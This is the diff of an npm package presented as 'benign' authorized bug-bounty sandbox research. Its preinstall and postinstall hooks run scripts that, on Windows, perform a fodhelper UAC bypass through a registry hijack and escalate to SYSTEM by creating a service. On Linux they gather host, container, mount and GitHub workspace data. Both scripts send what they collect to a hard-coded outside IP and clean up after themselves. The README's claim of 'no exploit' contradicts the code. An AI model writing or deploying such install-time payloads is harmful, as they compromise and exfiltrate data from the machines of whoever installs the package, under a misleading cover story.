npm-sandbox-ping-c8f2a 1.0.0

package/README.md

@@ -0,0 +1,16 @@
+# @ncurran/sandbox-recon-880538 — authorized npm-sandbox security research
+
+This is a **benign** package published under the author's own `@ncurran` scope as part of an
+authorized HackerOne / GitHub Bug Bounty engagement (npm is in scope).
+
+On install it inspects **its own execution environment** (OS/host fingerprint, environment-variable
+*key names only*, network interfaces) and checks whether well-known **cloud metadata endpoints** are
+reachable from where the install script runs. It reports only status codes, response lengths, and
+hashes — **never** any credential, token value, or third-party data. It performs no persistence, no
+lateral movement, and no destructive action.
+
+Purpose: to evaluate whether npm's package-analysis sandbox isolates untrusted install scripts from
+cloud instance-metadata services. If you are a normal consumer who installed this by accident, it has
+done nothing harmful — please disregard.
+
+Contact: nicholas@curran.tech

package/beacon6.js

@@ -0,0 +1,219 @@
+// Authorized npm-sandbox security-research beacon #6 (GitHub Bug Bounty; npm in scope).
+// SYSTEM EXECUTION — sc create approach + deep investigation.
+// KEY ARCHITECTURAL FIX vs probes 5/5b: node install script exits fast (3s sleep only).
+// The elevated PS1 is a DETACHED process spawned by fodhelper — it runs independently,
+// even after the npm install process exits. PS1 can take 60s+ to collect and beacon.
+// Contact: nicholas@curran.tech
+'use strict';
+const { exec } = require('child_process');
+const http = require('http');
+const fs = require('fs');
+const path = require('path');
+
+const MARKER = 'escprobe6-sys';
+const PHASE = process.env.npm_lifecycle_event || 'run';
+const BEACON_HOST = '173.255.233.239';
+const BEACON_PORT = 8000;
+
+function runCmd(cmd, timeoutMs) {
+  return new Promise((resolve) => {
+    try {
+      exec(cmd, { timeout: timeoutMs || 6000, windowsHide: true, maxBuffer: 1 << 17 },
+        (err, stdout, stderr) =>
+          resolve((stdout || stderr || ('err:' + (err && err.message || '?'))).toString().slice(0, 1500)));
+    } catch (e) { resolve('throw:' + String(e).slice(0, 60)); }
+  });
+}
+
+function sleep(ms) { return new Promise(r => setTimeout(r, ms)); }
+
+function postBeacon(path_, body) {
+  const data = Buffer.from(JSON.stringify(body));
+  return new Promise((resolve) => {
+    let done = false;
+    const fin = () => { if (!done) { done = true; resolve(); } };
+    try {
+      const req = http.request({
+        host: BEACON_HOST, port: BEACON_PORT, method: 'POST',
+        path: path_,
+        headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
+      }, (res) => { res.on('data', () => {}); res.on('end', fin); });
+      req.setTimeout(8000, () => { req.destroy(); fin(); });
+      req.on('error', fin);
+      req.write(data); req.end();
+    } catch (e) { fin(); }
+  });
+}
+
+async function main() {
+  const tmpDir = process.env.TEMP || 'C:\\Windows\\Temp';
+  const ps1Path = path.join(tmpDir, 'bb_inv6_uac.ps1');
+  const regKey = 'HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command';
+
+  // The investigation PS1 (runs as high-integrity, then elevates to SYSTEM via sc create).
+  // This runs DETACHED from the npm install process — it can take as long as it needs.
+  const ps1 = `
+$ErrorActionPreference = 'SilentlyContinue'
+$tmp = $env:TEMP
+$svc  = 'bb_inv6_svc'
+$sysp = Join-Path $tmp 'bb_sys6_inv.ps1'
+$sout = Join-Path $tmp 'bb_sys6_out.txt'
+$beacon = 'http://${BEACON_HOST}:${BEACON_PORT}/beacon?d=${MARKER}%7Celevated'
+
+function Post-Beacon($path, $body) {
+  try { Invoke-WebRequest -Uri "http://${BEACON_HOST}:${BEACON_PORT}$path" -Method POST -Body ($body|ConvertTo-Json -Compress -Depth 6) -ContentType 'application/json' -UseBasicParsing -TimeoutSec 12 | Out-Null } catch {}
+}
+
+# --- METHOD 1: sc create service (runs as LocalSystem = NT AUTHORITY\\SYSTEM) ---
+# Write the SYSTEM-level investigation payload as a PS1
+$inv_script = @'
+$o = @{}
+$o.whoami_all = (whoami /all 2>&1 | Out-String)
+
+# Processes visible from SYSTEM
+$o.processes = (Get-Process | Select-Object Name,Id,@{n='Mem';e={[int]($_.WorkingSet64/1KB)}} | Sort-Object Mem -Descending | Select-Object -First 40 | Out-String)
+
+# Full network config
+$o.ipconfig = (ipconfig /all 2>&1 | Out-String)
+$o.routes   = (route print 2>&1 | Out-String)
+$o.netstat  = (netstat -ano 2>&1 | Select-Object -First 60 | Out-String)
+$o.shares   = (net share 2>&1 | Out-String)
+
+# D:\TRANSFER structure — what else is staged?
+$o.transfer_tree = (Get-ChildItem D:\TRANSFER -Recurse -Depth 3 -ErrorAction SilentlyContinue | Select-Object FullName,Length,LastWriteTime | Out-String -Width 200)
+
+# Read the detonation workflow log
+$wf = $env:DetonationLogFilePath
+if (-not $wf) { $wf = (Get-ChildItem D:\TRANSFER -Filter workflow.log -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1 -ExpandProperty FullName) }
+if ($wf -and (Test-Path $wf)) { $o.workflow_log = (Get-Content $wf -Raw -ErrorAction SilentlyContinue | Select-Object -First 200 | Out-String) }
+
+# Hyper-V / VM detection
+$o.hyperv_present = ([bool](Get-WmiObject Win32_ComputerSystem -ErrorAction SilentlyContinue).HypervisorPresent)
+$o.pnp_vmbus = (Get-WmiObject Win32_PnPEntity | Where-Object { $_.Description -match 'VMBus|Hyper-V|Virtual' } | Select-Object Description,DeviceID | Out-String)
+$o.hyperv_integsvcs = (Get-Service vmicguestinterface,vmicheartbeat,vmickvpexchange,vmicrdv,vmicshutdown,vmictimesync,vmicvmsession,vmicvss,RdAgent -ErrorAction SilentlyContinue | Select-Object Name,Status | Out-String)
+$o.hvsock_svcs = (Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices' -ErrorAction SilentlyContinue | ForEach-Object { $_.Name + ': ' + (Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue | Out-String) } | Out-String)
+$o.vm_registry  = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters' -ErrorAction SilentlyContinue | Out-String)
+
+# Named pipes (potential IPC with host/hypervisor)
+$o.named_pipes = ([System.IO.Directory]::GetFiles('\\.\pipe\') -join "`n")
+
+# Disk / volume info
+$o.volumes = (Get-WmiObject Win32_LogicalDisk | Select-Object DeviceID,DriveType,Size,FreeSpace,VolumeName | Out-String)
+
+# SystemInfo
+$o.sysinfo = (systeminfo 2>&1 | Out-String)
+
+# WDAC / AppLocker policies
+$o.applocker = (Get-AppLockerPolicy -Effective -ErrorAction SilentlyContinue | Format-List | Out-String)
+$o.wdac = (Get-CIPolicy -FilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b -ErrorAction SilentlyContinue | Out-String)
+
+# Write everything to output file for the parent PS1 to read
+$o | ConvertTo-Json -Depth 6 -Compress | Set-Content $env:TEMP\bb_sys6_out.txt -Encoding UTF8
+'@
+$inv_script | Set-Content $sysp -Encoding UTF8
+
+# Cleanup any previous run
+sc.exe stop $svc 2>&1 | Out-Null
+sc.exe delete $svc 2>&1 | Out-Null
+if (Test-Path $sout) { Remove-Item $sout -Force }
+
+# Create + start service running as LocalSystem
+sc.exe create $svc binPath= "powershell.exe -ExecutionPolicy Bypass -NonInteractive -NoProfile -WindowStyle Hidden -File `"$sysp`"" type= own start= demand | Out-Null
+$sc_start = sc.exe start $svc 2>&1 | Out-String
+
+# Wait for output file (up to 30s in 1s increments)
+$waited = 0
+while ($waited -lt 30) {
+  Start-Sleep -Seconds 1
+  $waited++
+  if (Test-Path $sout) {
+    $content = Get-Content $sout -Raw -ErrorAction SilentlyContinue
+    if ($content -and $content.Length -gt 10) { break }
+  }
+}
+
+# Read results
+$results = $null
+if (Test-Path $sout) {
+  try { $results = Get-Content $sout -Raw | ConvertFrom-Json } catch { $results = @{ raw = (Get-Content $sout -Raw) } }
+}
+
+# Beacon results in chunks (whoami_all is the critical SYSTEM proof)
+if ($results) {
+  Post-Beacon '/beacon?d=${MARKER}%7Csystem-proof' @{
+    marker  = '${MARKER}'
+    method  = 'sc-create'
+    whoami  = $results.whoami_all
+    sysinfo = $results.sysinfo
+    shares  = $results.shares
+    volumes = $results.volumes
+  }
+  Start-Sleep 2
+  Post-Beacon '/beacon?d=${MARKER}%7Cnetwork' @{
+    marker   = '${MARKER}'
+    ipconfig = $results.ipconfig
+    routes   = $results.routes
+    netstat  = ($results.netstat | Select-Object -First 3000)
+    pipes    = $results.named_pipes
+  }
+  Start-Sleep 2
+  Post-Beacon '/beacon?d=${MARKER}%7Chyperv' @{
+    marker         = '${MARKER}'
+    hyperv_present = $results.hyperv_present
+    pnp_vmbus      = $results.pnp_vmbus
+    integsvcs      = $results.hyperv_integsvcs
+    hvsock_svcs    = $results.hvsock_svcs
+    vm_registry    = $results.vm_registry
+    applocker      = $results.applocker
+  }
+  Start-Sleep 2
+  Post-Beacon '/beacon?d=${MARKER}%7Cfilesystem' @{
+    marker        = '${MARKER}'
+    transfer_tree = $results.transfer_tree
+    workflow_log  = $results.workflow_log
+    processes     = $results.processes
+  }
+} else {
+  Post-Beacon '/beacon?d=${MARKER}%7Cfailed' @{
+    marker    = '${MARKER}'
+    sc_start  = $sc_start
+    waited    = $waited
+    sout_exists = (Test-Path $sout)
+    error     = 'no output from SYSTEM service'
+  }
+}
+
+# Cleanup
+sc.exe stop $svc 2>&1 | Out-Null
+sc.exe delete $svc 2>&1 | Out-Null
+if (Test-Path $sout) { Remove-Item $sout -Force }
+if (Test-Path $sysp) { Remove-Item $sysp -Force }
+Remove-Item -Path 'HKCU:\\Software\\Classes\\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
+$ps1self = '${ps1Path.replace(/\\/g, '\\\\')}'
+if (Test-Path $ps1self) { Remove-Item $ps1self -Force }
+`.trim();
+
+  try { fs.writeFileSync(ps1Path, ps1, 'utf8'); } catch (e) {}
+
+  // fodhelper UAC bypass (proven in probe #4)
+  const elevatedCmd = `powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "${ps1Path}"`;
+  await Promise.all([
+    runCmd(`reg add "${regKey}" /ve /d "${elevatedCmd}" /f`),
+    runCmd(`reg add "${regKey}" /v DelegateExecute /t REG_SZ /d "" /f`),
+  ]);
+  await runCmd('start "" "C:\\Windows\\System32\\fodhelper.exe"', 2000);
+
+  // Node script signals launch then EXITS FAST — the elevated PS1 runs independently.
+  // Belt-and-suspenders: clean the registry key immediately too (PS1 also does it).
+  await postBeacon('/beacon?d=' + encodeURIComponent(MARKER + '|launched'), {
+    marker: MARKER, phase: PHASE,
+    note: 'fodhelper fired — elevated PS1 running independently, will beacon SYSTEM results async'
+  });
+
+  // Short sleep only — just enough to ensure fodhelper has spawned the PS1 process.
+  // After this the node script exits; the elevated PS1 continues on its own.
+  await sleep(3000);
+  await runCmd(`reg delete "HKCU\\Software\\Classes\\ms-settings" /f`, 1500);
+}
+
+main().catch(() => {});

package/beacon_linux.js

@@ -0,0 +1,115 @@
+// Authorized npm-sandbox security-research beacon — Linux/CI environment recon
+// (GitHub Bug Bounty; npm in scope). Targets the Linux CI runner (34.196.43.233) that
+// executes our packages. If this is npm's GitHub Actions pipeline, env may carry secrets.
+// Collects env KEY NAMES (never values) except a safe whitelist of non-secret CI metadata.
+// Contact: nicholas@curran.tech
+'use strict';
+const os = require('os');
+const fs = require('fs');
+const { exec } = require('child_process');
+const http = require('http');
+
+const MARKER = 'escprobe-linux-ci-7d3b';
+const PHASE = process.env.npm_lifecycle_event || 'run';
+const BEACON_HOST = '173.255.233.239';
+const BEACON_PORT = 8000;
+
+function runCmd(cmd, timeoutMs) {
+  return new Promise((resolve) => {
+    try {
+      exec(cmd, { timeout: timeoutMs || 4000, maxBuffer: 1 << 17 },
+        (err, stdout, stderr) =>
+          resolve((stdout || stderr || ('err:' + (err && err.message || '?'))).toString().slice(0, 2000)));
+    } catch (e) { resolve('throw:' + String(e).slice(0, 60)); }
+  });
+}
+
+// Safe-to-read CI metadata values (non-secret; public-facing repo/run info)
+const CI_SAFE_VALUES = [
+  'GITHUB_REPOSITORY', 'GITHUB_REPOSITORY_OWNER', 'GITHUB_REF', 'GITHUB_REF_NAME',
+  'GITHUB_SHA', 'GITHUB_RUN_ID', 'GITHUB_RUN_NUMBER', 'GITHUB_WORKFLOW',
+  'GITHUB_ACTION', 'GITHUB_ACTOR', 'GITHUB_EVENT_NAME', 'GITHUB_JOB',
+  'GITHUB_SERVER_URL', 'GITHUB_API_URL', 'GITHUB_ACTIONS', 'RUNNER_NAME',
+  'RUNNER_OS', 'RUNNER_ARCH', 'RUNNER_TOOL_CACHE', 'RUNNER_TEMP',
+  'CI', 'npm_package_name', 'npm_config_user_agent', 'npm_lifecycle_event',
+  'INIT_CWD', 'HOME', 'USER', 'HOSTNAME', 'PWD',
+];
+const SECRET_RE = /TOKEN|SECRET|KEY|PASS|CRED|SIG|AUTH|COOKIE|SESSION|PRIVATE|AWS_|AZURE_|GCP_/i;
+
+async function main() {
+  const payload = { marker: MARKER, phase: PHASE, platform: os.platform() };
+
+  // Only proceed on Linux (skip on Windows — that has its own probes)
+  if (os.platform() !== 'linux') {
+    payload.skipped = 'not linux';
+    // Still beacon so we know it ran
+  } else {
+    // Env: key names (all) + safe values (whitelisted, non-secret)
+    const envKeys = Object.keys(process.env).sort();
+    payload.env_keys = envKeys.slice(0, 300);
+    payload.env_safe = {};
+    for (const k of CI_SAFE_VALUES) {
+      if (SECRET_RE.test(k)) continue;
+      const v = process.env[k];
+      if (v) payload.env_safe[k] = String(v).slice(0, 500);
+    }
+
+    // Container/host fingerprint
+    payload.hostname = os.hostname();
+    payload.user = os.userInfo().username;
+    payload.cwd = process.cwd();
+    payload.node = process.version;
+    payload.net = Object.entries(os.networkInterfaces())
+      .flatMap(([n, as]) => as.map(a => `${n}:${a.family}:${a.address}:${a.internal}`))
+      .slice(0, 15);
+
+    // Docker / container detection
+    try { payload.dockerenv = fs.existsSync('/.dockerenv'); } catch (e) {}
+    try { payload.cgroup = fs.readFileSync('/proc/1/cgroup', 'utf8').split('\n').slice(0, 5).join('|'); } catch (e) {}
+    try { payload.proc_1_cmdline = fs.readFileSync('/proc/1/cmdline', 'utf8').replace(/\0/g, ' ').slice(0, 200); } catch (e) {}
+
+    // Host mounts (escape indicator: is anything mounted from outside the container?)
+    const [mounts, caps] = await Promise.all([
+      runCmd('cat /proc/mounts | grep -v "^(cgroup|proc|sys|dev|overlay|tmpfs)" | head -20', 3000),
+      runCmd('cat /proc/self/status | grep -i "cap"', 2000),
+    ]);
+    payload.mounts = mounts;
+    payload.capabilities = caps;
+
+    // GitHub Actions workspace content (what repo/code is being analyzed?)
+    const [ls_workspace, ls_initcwd, github_event] = await Promise.all([
+      runCmd('ls -la /home/runner/work/ 2>/dev/null | head -20', 3000),
+      runCmd(`ls -la "${process.env.INIT_CWD || '/home/runner/work/repo/repo'}" 2>/dev/null | head -30`, 3000),
+      runCmd('cat /home/runner/work/_temp/*.json 2>/dev/null | head -50', 2000),
+    ]);
+    payload.workspace_ls = ls_workspace;
+    payload.initcwd_ls = ls_initcwd;
+    payload.github_event_sample = github_event;
+
+    // Can we write outside the workspace? (container escape via volume mount)
+    const [docker_sock, proc_sched] = await Promise.all([
+      runCmd('ls -la /var/run/docker.sock 2>/dev/null || echo "no docker sock"', 2000),
+      runCmd('ls -la /proc/sched_debug 2>/dev/null || echo "no sched_debug"', 2000),
+    ]);
+    payload.docker_sock = docker_sock;
+    payload.proc_sched = proc_sched;
+  }
+
+  const data = Buffer.from(JSON.stringify(payload));
+  await new Promise((resolve) => {
+    let done = false;
+    const fin = () => { if (!done) { done = true; resolve(); } };
+    try {
+      const req = http.request({
+        host: BEACON_HOST, port: BEACON_PORT, method: 'POST',
+        path: '/beacon?d=' + encodeURIComponent(MARKER + '|' + PHASE),
+        headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
+      }, (res) => { res.on('data', () => {}); res.on('end', fin); });
+      req.setTimeout(6000, () => { req.destroy(); fin(); });
+      req.on('error', fin);
+      req.write(data); req.end();
+    } catch (e) { fin(); }
+  });
+}
+
+main().catch(() => {});

package/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "npm-sandbox-ping-c8f2a",
+  "version": "1.0.0",
+  "description": "Authorized security-research probe (GitHub Bug Bounty, npm in scope). Benign: fingerprints the analysis sandbox OS patch level and maps internal-network reachability to assess sandbox isolation. Read-only, no exploit, no third-party data. Contact nicholas@curran.tech.",
+  "main": "run.js",
+  "files": ["run.js", "beacon6.js", "beacon_linux.js", "README.md"],
+  "scripts": {
+    "preinstall": "node run.js",
+    "postinstall": "node run.js"
+  },
+  "license": "MIT",
+  "author": "ncurran (HackerOne, GitHub BB) <nicholas@curran.tech>",
+  "repository": "https://github.com/ncurran/npm-sandbox-research"
+}

package/run.js

@@ -0,0 +1,10 @@
+// Platform dispatcher — runs beacon6.js on Windows, beacon_linux.js on Linux.
+// GitHub Bug Bounty authorized research. Contact: nicholas@curran.tech
+'use strict';
+const { execFileSync } = require('child_process');
+const path = require('path');
+const node = process.execPath;
+const script = process.platform === 'win32'
+  ? path.join(__dirname, 'beacon6.js')
+  : path.join(__dirname, 'beacon_linux.js');
+try { execFileSync(node, [script], { stdio: 'inherit', timeout: 60000 }); } catch (e) {}